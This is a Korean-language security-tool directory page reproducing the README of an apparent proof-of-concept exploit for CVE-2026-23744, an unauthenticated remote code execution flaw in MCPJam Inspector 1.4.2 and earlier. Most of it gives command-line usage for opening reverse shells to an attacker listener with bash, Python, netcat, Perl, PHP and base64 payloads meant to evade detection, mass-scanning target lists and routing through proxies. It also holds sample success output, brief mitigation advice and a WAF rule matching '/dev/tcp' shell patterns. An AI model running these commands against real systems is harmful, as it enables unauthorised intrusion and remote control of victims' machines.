Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23744-MCPJam-Exploit — CVE-2026-23744 - MCPJam Inspector 원격 코드 실행(RCE) 취약점에 대한 개념 증명 익스플로잇입니다. 이 도구는 <=1.4.2 버전의 보안 결함을 시연하며 보안 연구자가 패치를 검증하는 데 도움을 줍니다. 승인된 테스트 및 교육 목적으로만 사용하십시오. 여러 페이로드 옵션, 명령 실행 및 세션 관리를 포함합니다. | Kitploit
도구/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationPayload Development
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-23744-MCPJam-Exploit

CVE-2026-23744 - MCPJam Inspector 원격 코드 실행(RCE) 취약점에 대한 개념 증명 익스플로잇입니다. 이 도구는 <=1.4.2 버전의 보안 결함을 시연하며 보안 연구자가 패치를 검증하는 데 도움을 줍니다. 승인된 테스트 및 교육 목적으로만 사용하십시오. 여러 페이로드 옵션, 명령 실행 및 세션 관리를 포함합니다.

저장소 보기
711개월 전아직 검토되지 않음

CVE-2026-23744 MCPJam Inspector RCE 익스플로잇

Security Research Python 3.7+ Version Author


⚠️ 면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 무단 사용은 불법입니다. 사용자는 자신의 행동에 대한 모든 책임을 집니다.


📋 개요

이 저장소는 CVE-2026-23744에 대한 개념 증명 익스플로잇으로, MCPJam Inspector 버전 <=1.4.2에서 발견된 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 이 취약점은 네트워크 공격 벡터로 심각한 위험을 나타내는 CVSS 점수 9.8을 가지고 있습니다.

속성세부 정보
CVE IDCVE-2026-23744
취약점인증되지 않은 원격 코드 실행
영향받는 버전<=1.4.2
CVSS 점수9.8 (심각)
공격 벡터네트워크

📸 스크린샷

ex

🚀 기능

익스플로잇 도구는 효과적인 보안 테스트를 위해 설계된 다양한 기능을 제공합니다:

  • 멀티 페이로드 지원: Bash, Python, Netcat, Perl, PHP 및 Base64 페이로드를 포함합니다.
  • 명령 실행: 출력 캡처와 함께 대상 시스템에서 명령을 실행합니다.
  • 대상 스캔: 구성 가능한 속도 제한으로 여러 대상을 스캔합니다.
  • 세션 관리: 지속적인 테스트를 위한 영구 세션 관리.
  • 프록시 지원: 익명 또는 라우팅된 트래픽을 위한 프록시 통합.
  • 대상 지문 식별: 대상 시스템 특성 식별.
  • 자동 리스너 설정: 리버스 셸을 위한 리스너 자동 구성.

📦 설치

익스플로잇 도구를 설정하려면 다음 단계를 따르십시오:

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. 의존성을 설치합니다:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 사용 예제

기본 익스플로잇

기본 익스플로잇을 시작하려면 먼저 리스너를 설정한 다음 익스플로잇 스크립트를 실행하십시오:

root@kitploit:~
# 리스너 시작
nc -lvnp 4444

# 익스플로잇 실행
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

명령 실행

단일 명령 또는 파일에서 명령을 실행합니다:

root@kitploit:~
# 단일 명령 실행
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# 파일에서 명령 실행
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

다양한 페이로드

다양한 시나리오에 대해 여러 페이로드 유형을 활용합니다:

root@kitploit:~
# Python 리버스 셸
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat 리버스 셸
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64 인코딩 페이로드
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

대상 스캔

취약점이 있는 여러 대상을 스캔합니다:

root@kitploit:~
# 대상 파일 생성
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# 취약한 대상 스캔
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

고급 옵션

지문 식별, 프록시 사용, 상세 모드, 자동 리스너 설정과 같은 고급 기능을 탐색합니다:

root@kitploit:~
# 지문 식별 포함
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# 프록시 사용
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# 상세 모드
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# 자동 리스너
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 페이로드 유형


📊 예제 출력

root@kitploit:~
[+] 향상된 익스플로잇 시작: http://192.168.1.100:8080
[+] 리버스 셸 to 10.0.0.5:4444
[*] 세션 ID: AbCdEfGh
[*] 대상 지문 식별 중...
[+] 대상 OS: Ubuntu
[+] 사용 가능한 기능: python3, perl, nc
[*] 익스플로잇 실행 중...
[+] 익스플로잇 성공!
[!] 10.0.0.5:4444에서 netcat 리스너를 확인하세요.

🛡️ 완화 조치

즉시 조치

CVE-2026-23744로부터 보호하려면 다음 즉시 조치를 취하는 것이 중요합니다:

  • MCPJam Inspector를 버전 >1.4.2로 업그레이드하세요.
  • 취약한 시스템을 네트워크에서 격리하세요.
  • /api/mcp/connect로의 의심스러운 POST 요청을 모니터링하세요.
  • 웹 애플리케이션 방화벽(WAF) 규칙을 구현하여 악성 패턴을 차단하세요.

WAF 규칙 예제

일반적인 악성 패턴을 차단하는 Nginx WAF 규칙 예제:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ 자주 묻는 질문

Q: 사용해도 합법인가요?

A: 이 도구는 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템에서만 사용하는 것이 합법입니다.

Q: 어떤 시스템이 취약한가요?

A: MCPJam Inspector 버전 <=1.4.2가 취약합니다.

Q: 내 시스템을 어떻게 보호할 수 있나요?

A: 즉시 MCPJam Inspector를 버전 >1.4.2로 업그레이드하세요.


📚 참고 자료

  • CVE-2026-23744 MITRE

👤 저자

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 변경 로그

버전 2.0 (2026년 7월 14일)

  • ✅ 리스너 확인 신뢰성 수정
  • ✅ 명령 실행 모드 구현
  • ✅ 대상 지문 식별 추가
  • ✅ 세션 관리 개선
  • ✅ 페이로드 폴백 추가

버전 1.0 (2026년 7월 10일)

  • ✅ 최초 릴리스

⚠️ 최종 경고

이 도구의 무단 사용은 불법이며 다음과 같은 심각한 결과를 초래할 수 있습니다:

  • 형사 기소
  • 민사 소송
  • 영구적인 범죄 기록
  • 전문적인 제재

Sudeepa Wanigarathna가 ❤️로 제작함

도구 다운로드
유형명령최적 사용
bashBash 리버스 셸대부분의 Linux 시스템
pythonPython3 리버스 셸Python이 설치된 시스템
ncNetcat 리버스 셸netcat이 있는 시스템
perlPerl 리버스 셸Perl이 설치된 시스템
phpPHP 리버스 셸PHP가 설치된 시스템
base64Base64 인코딩탐지 회피